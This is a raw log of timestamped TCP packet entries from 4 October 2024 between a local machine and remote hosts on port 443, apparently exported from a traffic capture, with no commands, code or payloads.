                                                                                                        Oct 4, 2024 15:11:22.797801018 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.797808886 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.798595905 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.798669100 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.798676014 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.800244093 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.800306082 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.800314903 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.800407887 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.800476074 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.800482035 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.819955111 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.820008993 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.820173979 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.820425987 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.820439100 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.830353022 CEST49721443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.845350027 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.872383118 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.872895002 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.872997046 CEST49721443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.873013973 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.873617887 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.873648882 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.873671055 CEST49721443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.873678923 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.873748064 CEST49721443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.874232054 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.874388933 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.874478102 CEST49721443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.874486923 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.874747038 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.874794960 CEST49721443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.874803066 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.875588894 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.875618935 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.875657082 CEST49721443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.875668049 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.875713110 CEST49721443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.876440048 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.876486063 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.876558065 CEST49721443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.876566887 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.877376080 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.877404928 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.877465010 CEST49721443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.877475023 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.878145933 CEST49721443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.878528118 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.878621101 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.878709078 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.878756046 CEST49721443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.878912926 CEST49721443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.878931046 CEST44349721104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.882474899 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.882672071 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.882981062 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.883014917 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.883033037 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.883047104 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.883080959 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.891576052 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.891612053 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.891647100 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.891669035 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.891678095 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.891690969 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.891716957 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.891731024 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.891740084 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.891771078 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.891798973 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.891808987 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.891817093 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.891849041 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.891880989 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.891887903 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.891896009 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.891921997 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.891932964 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.891973972 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.891980886 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.892014980 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.892049074 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.892076969 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.892090082 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.892097950 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.892113924 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.941339016 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.941354036 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.968534946 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.968604088 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.968619108 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.968941927 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.969000101 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.969006062 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.971060991 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.971071005 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.971117020 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.971126080 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.972378969 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.972409964 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.972429037 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.972436905 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.972460985 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.973931074 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.974011898 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.974021912 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.974271059 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.974684954 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.974746943 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.975361109 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.975420952 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.976299047 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.976350069 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.978395939 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.978434086 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.978461981 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.978471041 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.978497028 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.979958057 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.979990005 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.980011940 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.980020046 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.980043888 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.981028080 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.981085062 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.981093884 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.981158972 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.981738091 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.981811047 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:22.982547998 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.982626915 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.055375099 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.055466890 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.055876970 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.055955887 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.056653976 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.056709051 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.057497978 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.057579041 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.058378935 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.058434010 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.059277058 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.059339046 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.060142994 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.060203075 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.061012030 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.061072111 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.061904907 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.061960936 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.062618017 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.062679052 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.063555002 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.063621044 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.064506054 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.064549923 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.064567089 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.064579964 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.064595938 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.065365076 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.065452099 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.065495968 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.065524101 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.065625906 CEST49722443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.065644979 CEST44349722104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.069531918 CEST49724443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.069576979 CEST44349724104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.069860935 CEST49724443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.070080996 CEST49724443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.070095062 CEST44349724104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.281573057 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.281852961 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.281882048 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.282226086 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.282530069 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.282594919 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.282669067 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.323415041 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.336342096 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.418078899 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.418127060 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.418186903 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.418206930 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.418857098 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.418967009 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.418979883 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.418992043 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.419034004 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.419039965 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.419730902 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.419785976 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.419794083 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.423124075 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.423177958 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.423192024 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.423738003 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.423785925 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.423794985 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.463347912 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.504477024 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.504751921 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.504791021 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.504807949 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.504832983 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.504873991 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.504879951 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.506548882 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.506601095 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.506607056 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.506995916 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.507033110 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.507066011 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.507098913 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.507101059 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.507107019 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.507112026 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.507158041 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.507164001 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.508084059 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.508116961 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.508188963 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.508207083 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.508213997 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.508234024 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.508905888 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.508944035 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.508961916 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.508969069 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.509008884 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.509681940 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.531497955 CEST44349724104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.531800032 CEST49724443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.531810045 CEST44349724104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.532197952 CEST44349724104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.532619953 CEST49724443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.532701969 CEST44349724104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.532953978 CEST49724443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.549597025 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.549643993 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.549673080 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.549683094 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.549691916 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.549730062 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.579401016 CEST44349724104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.589368105 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.591233015 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.591429949 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.591494083 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.591506004 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.592261076 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.592272043 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.592341900 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.592348099 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.592809916 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.592849016 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.592856884 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.592861891 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.592890024 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.596513987 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.596626997 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.596668005 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.596682072 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.596682072 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.596688986 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.596708059 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.596750975 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.596750975 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.596760035 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.597306967 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.597449064 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.597455025 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.597506046 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.598345041 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.598428011 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.599463940 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.599524975 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.600045919 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.600101948 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.600239038 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.600358963 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.601274967 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.601336956 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.602129936 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.602309942 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.677140951 CEST44349724104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.677212954 CEST44349724104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.677288055 CEST49724443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.677917004 CEST49724443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.677928925 CEST44349724104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.677933931 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.677988052 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.678040981 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.678049088 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.678070068 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.678133965 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.678406954 CEST49723443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.678422928 CEST44349723104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.681555986 CEST49726443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.681574106 CEST44349726104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.681896925 CEST49726443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.682064056 CEST49726443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.682073116 CEST44349726104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.682637930 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.682663918 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.682753086 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.682967901 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.682980061 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.698165894 CEST49728443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:23.698193073 CEST44349728103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.698302984 CEST49728443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:23.698832989 CEST49728443192.168.2.16103.159.65.146
